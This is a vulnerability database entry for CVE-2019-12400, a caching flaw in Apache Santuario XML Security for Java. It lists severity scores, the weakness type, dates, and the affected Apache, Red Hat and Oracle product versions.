1. Home
  2. Vulnerabilities
  3. CVE-2019-12400

CVE-2019-12400

CVSS v3.1 5.5 (Medium)
55% Progress
CVSS v2.0 1.9 (Low)
19% Progress
EPSS 0.20 % (57th)
0.20% Progress
Affected Products 3
Advisories 1
Info CVSS EPSS CAPEC Affected Configurations References Security Advisories Packages & Software OVAL Tools, Exploits & PoC Graph Web & Social Timeline

In version 2.0.3 Apache Santuario XML Security for Java, a caching mechanism was introduced to speed up creating new XML documents using a static pool of DocumentBuilders. However, if some untrusted code can register a malicious implementation with the thread context class loader first, then this implementation might be cached and re-used by Apache Santuario - XML Security for Java, leading to potential security flaws when validating signed documents, etc. The vulnerability affects Apache Santuario - XML Security for Java 2.0.x releases from 2.0.3 and all 2.1.x releases before 2.1.4.

Weaknesses
CWE-20
Improper Input Validation
CVE Status
PUBLISHED
CNA
Apache Software Foundation
Published Date
2019-08-23 21:15:11
(5 years ago)
Updated Date
2023-11-07 03:03:33
(10 months ago)

Affected Products

Apache

Oracle

Redhat

Configuration #1

    CPE23 From Up To
  Apache Santuario Xml Security for Java from 2.0.3 version and 2.0.10 and prior versions cpe:2.3:a:apache:santuario_xml_security_for_java >= 2.0.3 <= 2.0.10
  Apache Santuario Xml Security for Java from 2.1.0 version and prior 2.1.4 version cpe:2.3:a:apache:santuario_xml_security_for_java >= 2.1.0 < 2.1.4

Configuration #2

    CPE23 From Up To
  Redhat Jboss Enterprise Application Platform 7.2 cpe:2.3:a:redhat:jboss_enterprise_application_platform:7.2

Configuration #3

    CPE23 From Up To
  Oracle Weblogic Server 12.2.1.4.0 cpe:2.3:a:oracle:weblogic_server:12.2.1.4.0
  Oracle Weblogic Server 14.1.1.0.0 cpe:2.3:a:oracle:weblogic_server:14.1.1.0.0